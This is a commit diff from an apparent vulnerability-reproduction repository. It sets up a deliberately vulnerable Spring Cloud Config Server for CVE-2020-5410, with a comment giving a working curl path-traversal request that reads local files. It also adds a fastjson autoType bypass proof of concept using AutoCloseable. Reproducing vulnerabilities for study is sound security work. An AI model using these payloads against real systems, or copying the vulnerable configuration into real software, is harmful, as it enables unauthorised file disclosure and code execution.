feat:CVE-2020-5410

Author: “threedr3am”

common/src/main/resources/META-INF/services/javax.script.ScriptEngineFactory

@@ -1 +1 @@
-CalcScriptEngineFactory
+#CalcScriptEngineFactory

fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Bypass.java

@@ -0,0 +1,43 @@
+package com.threedr3am.bug.fastjson.test;
+
+import com.alibaba.fastjson.JSON;
+
+/**
+ * @author threedr3am
+ */
+public class Bypass {
+
+    public static void main(String[] args) {
+        String json = "{\"@type\":\"java.lang.AutoCloseable\", \"@type\":\"com.threedr3am.bug.fastjson.test.AAAA\", \"rrr\": {\"@type\": \"com.threedr3am.bug.fastjson.test.BBBB\", \"eval\": \"fastjson\"}}";
+        JSON.parse(json);
+    }
+
+}
+
+class AAAA implements AutoCloseable {
+    private BBBB rrr;
+
+    public BBBB getRrr() {
+        return rrr;
+    }
+
+    public void setRrr(BBBB rrr) {
+        this.rrr = rrr;
+    }
+
+    @Override
+    public void close() throws Exception {
+
+    }
+}
+
+class BBBB {
+    private String eval;
+    public String getEval() {
+        return eval;
+    }
+    public void setEval(String eval) {
+        System.out.println(eval + " eval!");
+        this.eval = eval;
+    }
+}

spring/pom.xml

@@ -13,6 +13,7 @@
   <packaging>pom</packaging>
   <modules>
     <module>spring-boot-actuator-bug</module>
+    <module>spring-cloud-config-server-CVE-2020-5410</module>
   </modules>
 
 

spring/spring-cloud-config-server-CVE-2020-5410/pom.xml

@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+  <parent>
+    <groupId>org.springframework.boot</groupId>
+    <artifactId>spring-boot-starter-parent</artifactId>
+    <version>2.2.2.RELEASE</version>
+    <relativePath/>
+  </parent>
+  <modelVersion>4.0.0</modelVersion>
+  <artifactId>spring-cloud-config-server-CVE-2020-5410</artifactId>
+
+
+  <dependencies>
+    <dependency>
+      <groupId>org.springframework.boot</groupId>
+      <artifactId>spring-boot-starter</artifactId>
+    </dependency>
+
+    <dependency>
+      <groupId>org.springframework.cloud</groupId>
+      <artifactId>spring-cloud-config-server</artifactId>
+      <version>2.2.2.RELEASE</version>
+    </dependency>
+  </dependencies>
+
+
+
+</project>

spring/spring-cloud-config-server-CVE-2020-5410/src/main/java/com/threedr3am/bug/spring/config/server/Application.java

@@ -0,0 +1,17 @@
+package com.threedr3am.bug.spring.config.server;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+import org.springframework.cloud.config.server.EnableConfigServer;
+
+/**
+ * @author threedr3am
+ */
+@EnableConfigServer
+@SpringBootApplication
+public class Application {
+
+  public static void main(String[] args) {
+    SpringApplication.run(Application.class, args);
+  }
+}

spring/spring-cloud-config-server-CVE-2020-5410/src/main/java/com/threedr3am/bug/spring/config/server/package-info.java

@@ -0,0 +1,12 @@
+/**
+ *
+ * CVE-2020-5410
+ *
+ * org.springframework.cloud.config.server.environment.EnvironmentController#getEnvironment(java.lang.String, java.lang.String, java.lang.String, boolean)
+ *
+ * echo "threedr3am" > /Users/person/tmp/fakenew.txt
+ * curl http://127.0.0.1:9988/fakenew.txt%23/bbbbb/..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29Users%28_%29person%28_%29tmp%28_%29
+ *
+ * @author threedr3am
+ */
+package com.threedr3am.bug.spring.config.server;

spring/spring-cloud-config-server-CVE-2020-5410/src/main/resources/application.yml

@@ -0,0 +1,10 @@
+spring:
+  profiles:
+    active: native
+  cloud:
+    config:
+      server:
+        native:
+          search-locations: file:///tmp/{label},file:///tmp/{application},file:///tmp/{profiles}
+server:
+  port: 9988